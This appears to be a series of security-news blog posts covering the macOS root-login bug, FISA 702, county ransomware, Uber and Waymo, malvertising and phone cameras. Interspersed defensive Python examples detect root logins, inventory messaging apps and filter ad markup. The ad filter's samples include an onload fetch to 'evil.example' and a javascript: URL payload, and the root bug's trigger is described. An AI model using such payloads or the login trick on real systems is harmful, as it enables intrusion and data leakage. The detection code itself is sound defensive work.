
Apple is Trying to Catch up With Windows

Update: apparently if you are running macOS 10.13, apply the patch for the root bug and then upgrade to 10.13.1, the patch is undone and you have to reapply it.  In addition, the patch does not take effect until you reboot.  Just another bit of the mess.

macOS has generally been considered a secure operating system, but lately Apple has been imitating its friends in Redmond, and not in a good way.

The first macOS bug found recently is a new one.  On Linux and Unix systems the administrative account is called root, unlike Windows and some other operating systems, which call it Admin or Administrator.  In the current version of macOS, High Sierra (10.13), if you entered the user name root with an empty password you got an error message, but if you entered it a second time with an empty password it let you in with full administrative rights.

Initially, people thought the exploit required local access to the computer, but it turned out that if remote access (screen sharing or remote management) was turned on, as it is on many or most corporate Macs, the attack worked remotely as well.

What apparently happened is that the root account existed but was disabled and had no password set; the first failed login attempt enabled the account with that empty password, so the second attempt succeeded.  The quick workaround, before the patch, was to enable the root account yourself and set a strong password on it.

Apple quickly created a fix that was installed automatically and silently (I guess that is both good and bad), but that fix broke some other things, and Apple had to release a fix for the fix.  That second fix had to be installed manually and required some advanced gyrations on the part of the user.

The good news was that Apple fixed the bug quickly once it was told about it.  The bad news is that if a Mac was compromised before the patch was installed, which is statistically possible but unlikely, the only safe remedy is to wipe the disk and start over.
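Two checks an admin would want around this bug, as an added example that is not code from the original post: the first parses the output of `dscl . -read /Users/root AuthenticationAuthority` to tell whether the root account is enabled (a disabled account carries the `;DisabledUser;` tag in that attribute), and the second scans authentication log lines for successful root logins, in particular the fail-then-succeed pattern from one source that this bug produces.  The log format is a constructed, simplified one for the example, not the verbatim macOS unified-log format, and the sample lines are constructed too.

```python
"""Added example, not code from the original post: two checks an admin
would want around the High Sierra empty-password root login.

root_account_status() reads the output of
    dscl . -read /Users/root AuthenticationAuthority
and reports whether root is enabled; a disabled account carries the
';DisabledUser;' tag in that attribute.

find_root_logins() scans authentication log lines for root successes,
and in particular the fail-then-succeed pattern from one source.  The
log format is a constructed, simplified one for the example, not the
verbatim macOS unified-log format; adapt LOG_RE to the real source.
"""
import re
from datetime import datetime, timedelta

DISABLED_TAG = ";DisabledUser;"


def root_account_status(dscl_output):
    """Return 'enabled', 'disabled' or 'unknown' from dscl output."""
    for line in dscl_output.splitlines():
        if line.startswith("AuthenticationAuthority:"):
            return "disabled" if DISABLED_TAG in line else "enabled"
    return "unknown"  # attribute missing: treat as needing attention


# Constructed log format:
#   <date> <time> <host> auth: <RESULT> user=<u> via=<service> from=<src>
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) auth: "
    r"(?P<result>FAILED|SUCCESS) user=(?P<user>\S+) via=(?P<via>\S+) from=(?P<src>\S+)$"
)


def find_root_logins(lines, window_seconds=30):
    """Report every successful root authentication.

    A success that follows a failed root attempt from the same source
    within window_seconds is tagged 'fail_then_success', the signature of
    the bug described above.  Any other root success is tagged
    'root_success', which still deserves a look on a machine where root
    is supposed to be disabled.
    """
    last_failure = {}  # source -> timestamp of the last failed root attempt
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["user"] != "root":
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        src = m["src"]
        if m["result"] == "FAILED":
            last_failure[src] = ts
            continue
        prior = last_failure.get(src)
        kind = "root_success"
        if prior is not None and ts - prior <= timedelta(seconds=window_seconds):
            kind = "fail_then_success"
        findings.append({"kind": kind, "src": src, "via": m["via"], "line": line})
    return findings


# Constructed sample: a local console attempt and a remote screen-sharing one.
SAMPLE_LOG = [
    "2017-11-28 14:02:10 mac01 auth: FAILED user=root via=loginwindow from=console",
    "2017-11-28 14:02:13 mac01 auth: SUCCESS user=root via=loginwindow from=console",
    "2017-11-28 14:05:00 mac01 auth: FAILED user=alice via=loginwindow from=console",
    "2017-11-28 15:10:41 mac01 auth: FAILED user=root via=screensharing from=10.0.0.7",
    "2017-11-28 15:10:44 mac01 auth: SUCCESS user=root via=screensharing from=10.0.0.7",
    "2017-11-29 09:00:00 mac01 auth: SUCCESS user=root via=sudo from=console",
]

if __name__ == "__main__":
    print(root_account_status(
        "AuthenticationAuthority: ;DisabledUser;;ShadowHash;HASHLIST:<SALTED-SHA512-PBKDF2>"))
    for finding in find_root_logins(SAMPLE_LOG):
        print(finding["kind"], finding["via"], finding["src"])
```

The remote finding is the one to worry about: a root success over screen sharing from a network address, seconds after a root failure from the same address, is exactly what the remote form of this attack looks like.  Because the fix was reported to be undone by the 10.13.1 upgrade, the account-status check is worth running again after every OS update, not just once.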

But this was only the start of last month’s problems for Apple.

The second macOS bug, which also grants unlimited root access, had been around for at least a decade (sound like Windows again?), maybe two decades or more.

The person who found it was neither a professional hacker nor a professional security researcher, but a self-described hobbyist.  This means that other people (and not the well-intentioned ones) could have known about it for 20 years or more.

The bug is in IOHIDFamily, the kernel extension that handles human-interface devices such as keyboards and mice.  This code has been a problem child in the past.  The hobbyist who discovered the bug released a proof of concept for any attacker to follow at the same time he announced it.

As of 17 hours ago, Apple had yet to comment on it, but I assume that their engineers are busy working on how to fix it.

Right now it counts as an 0-day, and a nasty one.  0-days are bugs that were not (publicly) known about prior to the announcement.  Except that in this case it was probably known to others, such as Chinese, Russian or American intelligence services, and possibly exploited, maybe for many years.

For a while, Apple computers seemed to be immune to bugs.  I don’t think that is necessarily because the software is super secure, but rather because macOS is a niche player with a small market share (less than 8 percent according to NetMarketShare).  As other operating systems were attacked and started fixing bugs, macOS became the next target of opportunity.

So, in this case, one bug is fixed, albeit a bit bumpily, and the other is still open.

Happy New Year Mac users!

Information for this post came from CNet, The Guardian and BetaNews.

 


Congress Votes to Kick The Can Down The Road on Spying

Section 702 of the Foreign Intelligence Surveillance Act allows the intelligence community to collect intelligence on non-Americans outside the United States without a warrant.  As the intelligence community hoovers up huge quantities of data (it just built a new facility in Utah so that it could bring enough storage online to hold all of it), it is inevitable that it will collect information on Americans, absent a warrant and absent probable cause.  The agencies say there are controls in place to protect Americans, but those controls do not, some say, meet the requirements of the Fourth Amendment to the U.S. Constitution.

The Congress, in 2008, had the wisdom to require that Section 702 be renewed every few years.  The result of that is to force a debate and make Congress-critters go on record voting for or against whatever the revised 702 requires.  The last vote to renew Section 702 was in 2012 and it is set to expire on December 31, 2017, about 7 days from now.

In Congress there are several different factions right now:

  • One group wants to renew Section 702 as is and make it permanent.
  • Another group wants to require the FBI to get a court order before viewing information on Americans – information that they hope to use in criminal cases.
  • Others want the FBI to go to the Foreign Intelligence Surveillance Court to rule on the legality of queries about Americans, which is pretty much a rubber-stamp approval.
  • Finally others want to scrap it entirely.

So Congress did what it does best: it renewed Section 702 for another 28 days and went on vacation.

Congress is on vacation until January 8th, and with absolutely no agreement on what to do and only 10 days between its return and the expiration, do not be surprised if Congress kicks the can down the road again and extends it another 30 days.

Unlike some bills in Congress, this is not an Elephants vs. Donkeys issue;  this is a privacy rights vs. national security issue.

The House Freedom Caucus Chairman told the media that no long term extension would get through Congress at this time.

Republican Sen. Rand Paul and Democratic Sen. Ron Wyden want to bring the fight to the floor.

My personal opinion is that Congress is unlikely to let Section 702 expire.  I just don’t think that is going to happen.  But what form of restrictions are going to be put in place – that is a much harder question to answer.

 

Information for this post came from the Washington Post.

 

 


Mecklenburg County Hit With Ransomware Attack

Mecklenburg County, North Carolina, home to Charlotte, was hit with a ransomware attack that the county was clearly unprepared to handle.

The good news, if there is any in a situation like this, is that the attackers only compromised about 48 of the county’s roughly 500 servers, but other servers were shut down to make sure the ransomware didn’t spread to them.

The bad news, and there is much more of that, is that the county says it will be some time in 2018 before they get everything put back together.

Some reports say that the attackers wanted two bitcoins, about $30,000 at the time, but other reports say they wanted two bitcoins per server, which would have put the bill in the millions.  The county has decided not to pay the ransom.

The county said that because of a backup system, the hack didn’t compromise any personal information.  Clearly, the county officials do not understand how technology works.

This is also one reason why these local governmental organizations can be picked off pretty easily.  Likely due to staffing, money and lack of executive support, these local governments have poor to non-existent cyber security, disaster recovery and business continuity programs.

Examples of what that backup system amounts to in practice: calls to the domestic violence hotline are going to voice mail and being picked up later by counselors.

The county jail is having to process inmates in and out of the jail using paper forms.  I am highly confident that nothing will go wrong.

Social Services is having to re-create rides scheduled for seniors, and many of those ride requests have been lost for good.

Payments to the tax department have to be made by cash or check and building inspections are using paper forms.

The goal is to attempt to get life preserving services up first and the rest of the services restored in 2018.

Mecklenburg is far from alone in this plight.  City and county governments, especially, have neither the budget nor the expertise to deal with modern, real-world cyber attacks.  All they can do is hope that no one clicks on an infected link in an attack email.

The private sector is in better but not great shape.  Businesses are much more motivated to have systems that work and not to spend the millions of dollars that I am sure Mecklenburg is spending to rebuild servers from scratch.  Businesses also don’t want to lose customers.  When FedEx’s TNT Express unit was hit by NotPetya, customers switched to competitors.  Many of those will never come back.  Mecklenburg doesn’t have that problem – there is no competing government to switch to.

For private businesses, these attacks can be the difference between a profit and a loss, between staying in business and going out of business.  FedEx, in the example above, spent $300 million recovering from NotPetya last quarter and will spend an equal amount this quarter.  Many businesses cannot afford the bills that these attacks generate and simply go out of business.

Information for this post came from The Washington Post and NBC News.


Uber Naughty Tricks Hide Evidence of Theft

First a disclaimer:  I am not a lawyer and don’t pretend to be one on the Internet – at least most of the time.

The Uber Waymo trade secret theft trial is being delayed once again.

Why?  Because the Department of Justice showed the judge a 37-page letter from the lawyer of a former Uber employee that Uber had not shared with Waymo.  The judge now wants the former employee to appear in court.

The judge is “unhappy” with Uber because he asked them to produce all relevant documents months ago and this document was not among those produced.  The judge said that he can’t trust anything that they say because they have been proven wrong so many times before.  That is probably not the best way to get on the good side of the judge.

The ex-employee was fired from his job at Uber in April but still works for the company as a consultant.  They paid him $2 million plus, another million at the end of his consulting contract, and over $1 million in Uber stock.

The ex-employee said that Uber has a unit within the company called marketplace analytics whose job is to obtain competitive intelligence, “acquire” trade secrets and gather code bases.  Your basic dirty-tricks organization, whose job it is to break the law and steal confidential information from competitors.

OK, maybe I am being a bit harsh on them, but the methods and techniques really determine whether they broke any laws or not and that is still to be seen.

The ex-employee said that the employees of this group were trained in impeding, obstructing or influencing any lawsuit against Uber.  This includes working very hard to make sure that there was no paper trail of what they were doing.

The employees used self-destructing messaging services like Wickr, computers that could not be traced back to Uber and servers separate from the rest of the company.  They even made up reasons – apparently not legally valid ones – to claim attorney-client privilege.  They also engaged 10 outside security firms.

Waymo is suing Uber for almost $2 billion for theft of trade secrets.

Uber of course, said this is all made up.

There is one thing that is crystal clear as I play a lawyer on the Internet (no, this is not legal advice).  *IF*, and that is a big if, Uber hid information that it should have disclosed to the other side, that qualifies as a big no-no and could cause Uber all kinds of problems, all the way up to the judge entering a verdict in Waymo’s favor.  That level of pain is VERY unusual, but the judge could fine the company, hold it in contempt or instruct the jury to interpret certain facts in a way that is very unfavorable to Uber because of this.

Right now, he has delayed the trial while Waymo’s attorneys review the letter and decide what to do.

As far as how this affects you and me – if you believe that you MAY be sued, you have  “a duty to preserve” evidence that may be relevant to the future case.  Not preserving the evidence could cause you to lose the case.

OK, that seems pretty straight forward.

Well, maybe.  What if your employees, on their own, decided to use Telegram or Wickr, or other non-company systems, to process or store data, all of which could fall under your duty to preserve?  And what if they did this without telling senior management?

The company could be in a world of hurt legally.

What this means is that you, as an employer, need to understand what tools your employees may be using, even unofficially or unsanctioned, and work with your corporate attorneys to figure out whether that is a problem.

For certain industries, you have a duty to preserve even if there is no lawsuit anticipated, so for those companies, without regard to any potential lawsuit, using these tools can get them in trouble.
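A first-pass inventory of who is using which unsanctioned messaging tools, as an added example that is not from the original post: it builds a tool-by-user count from web-proxy logs so you know the answer before your lawyers have to ask.  The log format is a constructed, squid-like one, the sample lines are constructed, and the domain-to-tool map is an assumed starting list rather than an authoritative one.

```python
"""Added example, not from the original post: a first-pass inventory of
unsanctioned ephemeral-messaging tools built from web-proxy logs.

The log format is a constructed, squid-like one:
    <epoch> <user> <client-ip> <method> <url-or-host:port>
The domain list is an assumed starting point, not an authoritative one;
extend it from your own policy and your own traffic."""
from collections import defaultdict
from urllib.parse import urlsplit

# Assumed mapping from service domains to the tool they belong to.
WATCHED_DOMAINS = {
    "wickr.com": "Wickr",
    "telegram.org": "Telegram",
    "t.me": "Telegram",
    "signal.org": "Signal",
}


def tool_for_host(host):
    """Match a host or any of its parent domains against WATCHED_DOMAINS.

    Matching on label boundaries (not substrings) keeps 'notwickr.com'
    from being reported as Wickr.
    """
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):  # stop before the bare TLD
        tool = WATCHED_DOMAINS.get(".".join(labels[i:]))
        if tool:
            return tool
    return None


def host_from_request(method, target):
    """CONNECT carries host:port; other methods carry a full URL."""
    if method == "CONNECT":
        return target.rsplit(":", 1)[0]
    return urlsplit(target).hostname or ""


def inventory(lines):
    """Return {tool: {user: request_count}} for watched services."""
    seen = defaultdict(lambda: defaultdict(int))
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue  # malformed line, skip it
        _ts, user, _ip, method, target = fields
        tool = tool_for_host(host_from_request(method, target))
        if tool:
            seen[tool][user] += 1
    return {tool: dict(users) for tool, users in seen.items()}


# Constructed sample log lines.
SAMPLE_PROXY_LOG = [
    "1512345678.101 alice 10.1.2.3 CONNECT api.telegram.org:443",
    "1512345679.202 alice 10.1.2.3 CONNECT api.telegram.org:443",
    "1512345680.303 bob 10.1.2.4 GET http://www.example.com/index.html",
    "1512345681.404 carol 10.1.2.5 CONNECT messaging.wickr.com:443",
    "1512345682.505 bob 10.1.2.4 CONNECT t.me:443",
    "1512345683.606 dave 10.1.2.6 GET https://notwickr.com/",
]

if __name__ == "__main__":
    for tool, users in sorted(inventory(SAMPLE_PROXY_LOG).items()):
        print(tool, users)
```

Proxy logs only see traffic that goes through the proxy; phones on cellular data and laptops on home networks do not, so treat this as a starting point for the conversation with counsel, not as proof that nobody is using these tools.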

Something else for you to deal with.  Sorry.

Information for this post came from Reuters.


Gov May Block Malicious Content on Gov Computers but Not Yours

I have long complained about ads on web sites delivering malicious content along with the ads.  In fact, I have even advocated blocking ads because of it, but since most web sites exist on the revenue those ads generate, the ad content is only getting more invasive.

There have been many incidents of ads serving up malware and infecting computers in homes, businesses and government offices, so this is a real problem.  And, of course, if that malware gets onto government computers, it could steal important stuff.  Not like the malware on your computer or mine (or at least that seems to be what they are saying).

The government has a solution.  Sort of.  US Senator Ron Wyden sent a letter to White House cybersecurity coordinator Rob Joyce asking him to coordinate discussions with the advertising industry to end the delivery of malicious ads on government networks.

That’s not a bad thing although I am not sure why Wyden thinks it is OK to deliver malicious ads to you and me – just not to the government.

The good news is, of course, if they actually implement something to stop the delivery of malicious ads to government computers, they will likely implement it everywhere.

But after he makes this sort of benign request, he ups the ante.

If, after 180 days, you are not completely confident that the ad industry will effectively address this cyber threat, then have DHS issue a binding order requiring federal agencies to block all ads containing executable code.

I am sure that Google and the advertising industry are thrilled.  NOT!

In the industry’s defense, I am sure that they are trying to block malicious content; the only question is how hard.  After all, even malicious ads generate revenue, and it is hard to filter every ad.
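What "block all ads containing executable code" could look like at the creative level, as an added example that is not from the original post or from Wyden’s letter: a conservative filter that parses an ad creative’s HTML with the Python standard library and refuses anything that could run code in the page, namely `<script>`, `<object>`, `<embed>`, `<applet>` and `<iframe>` elements, `on*` event-handler attributes, and `javascript:`/`vbscript:` URLs.  The sample creatives are constructed.

```python
"""Added example, not from the original post or from Wyden's letter: a
conservative creative filter in the spirit of "block ads containing
executable code".  Anything that could execute is a reason to reject."""
import re
from html.parser import HTMLParser

EXECUTABLE_TAGS = {"script", "object", "embed", "applet", "iframe"}
URL_ATTRS = {"href", "src", "action", "formaction", "data", "xlink:href"}
SCRIPT_SCHEMES = {"javascript", "vbscript"}


class ExecutableContentFinder(HTMLParser):
    """Collects a reason for every executable construct seen in the markup."""

    def __init__(self):
        super().__init__()
        self.reasons = []

    # HTMLParser lower-cases tag and attribute names for us, and routes
    # self-closing tags (<img .../>) through handle_starttag as well.
    def handle_starttag(self, tag, attrs):
        if tag in EXECUTABLE_TAGS:
            self.reasons.append(f"<{tag}> element")
        for name, value in attrs:
            if name.startswith("on"):
                self.reasons.append(f"{name} handler on <{tag}>")
            elif name in URL_ATTRS and value:
                # Browsers ignore whitespace and control characters inside
                # the scheme, so strip them before deciding what it is.
                cleaned = re.sub(r"[\s\x00-\x1f]", "", value).lower()
                scheme = cleaned.split(":", 1)[0]
                if scheme in SCRIPT_SCHEMES and ":" in cleaned:
                    self.reasons.append(f"{scheme}: URL in {name} on <{tag}>")


def audit_ad(html):
    """Return the list of reasons a creative would be blocked (empty if clean)."""
    finder = ExecutableContentFinder()
    finder.feed(html)
    finder.close()
    return finder.reasons


def is_safe_ad(html):
    return not audit_ad(html)


# Constructed sample creatives.
SAFE_AD = ('<a href="https://ads.example/click?id=1">'
           '<img src="https://cdn.example/banner.png" alt="Spring sale"></a>')
SCRIPT_AD = '<div id="ad"><script src="https://cdn.example/ad.js"></script></div>'
HANDLER_AD = '<img src="https://cdn.example/b.png" onload="fetch(\'https://evil.example/beacon\')">'
JS_URL_AD = '<a href=" Java\tScript:alert(1)">click</a>'

if __name__ == "__main__":
    for name, creative in [("safe", SAFE_AD), ("script", SCRIPT_AD),
                           ("handler", HANDLER_AD), ("js-url", JS_URL_AD)]:
        print(name, "OK" if is_safe_ad(creative) else audit_ad(creative))
```

This is an allow-list-minded check on the creative markup only.  It does not see what the landing page or an ad network’s loader script does later, which is where much real malvertising lives, so it complements rather than replaces blocking at the network or browser level.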

If the White House takes Wyden seriously, that could be a problem for the advertising industry.  Whatever the government does, other businesses are likely to follow, and the end result would be a reduction in ad revenue if people start blocking ads in even larger numbers than they do today.  Software like Adblock Plus is pretty popular.  According to one stat, 26% of desktop users and 15% of mobile users currently block ads.  If that goes up even a few percentage points, it would be expensive for Google and the ad industry.

Sites that look for ad blockers and which won’t let you visit the site if you are blocking ads (like Forbes.com, for example) would be completely off limits to government workers.  That alone would, I think, motivate the industry to get off its rear and solve the problem.

Stay tuned and let’s see what Washington does.  If they really do something, that would be very helpful.

As I said, stay tuned.

Information for this post came from Bleeping Computer.


The Spy Among Us

Multiple sources are reporting a feature of iPhone apps that is a major privacy concern.  This is not new, and it is also an issue on Android phones, but for some reason everyone seems to be highlighting the problem with iPhones.  PERHAPS that is because it is being exploited in the wild on iPhones – I don’t know.

The short version goes like this –

IF you EVER allow an app to access your phone’s cameras, you have lost control of them.  That app can use the camera – both front facing and rear facing – any time it is running in the foreground, without asking you again.

You are trusting that app not to abuse that trust.

Actually, it kind of depends on whether YOU installed the app or someone else installed it – with or without your knowledge.  For example, here are 5 spying apps that people intentionally install.  It may be a parent or a spouse, but it is likely not you who installed the app.  Sometimes parents want to track what their kids are doing.  Sometimes a spouse wants to spy on their significant other.

The app could upload the photos to the net and/or it could process the images – say to examine your facial images as you look at the screen.

One part of the problem is that the phone gives no indication that either camera is on.  As a side note, while many PCs have a light indicating the camera is running, on many of them that light is controlled by firmware rather than wired to the sensor, and the camera COULD be turned on without the light coming on.

Apple (and Google) could change the camera rules and require the user to approve camera access every single time the camera wants to turn on – but that would be inconvenient.

One of my contacts at the FBI forwarded an alert about this today, so I suspect that this is being actively exploited.

The FBI gave a couple of suggestions –

  1. Only install apps from the official app store, not anyplace else.
  2. Don’t click on links in emails.

In reality, the only recommendation that the FBI made that will actually work is this next one:

3. Place a piece of tape over the front and rear cameras.

Ponder this thought –

The camera sits on your table in front of you;  it is in your bedroom, potentially capturing whatever you do there; it is in your bathroom. You get the idea.

Just in case you were not paranoid enough before.

Information for this post came from The Hacker News and The Register.
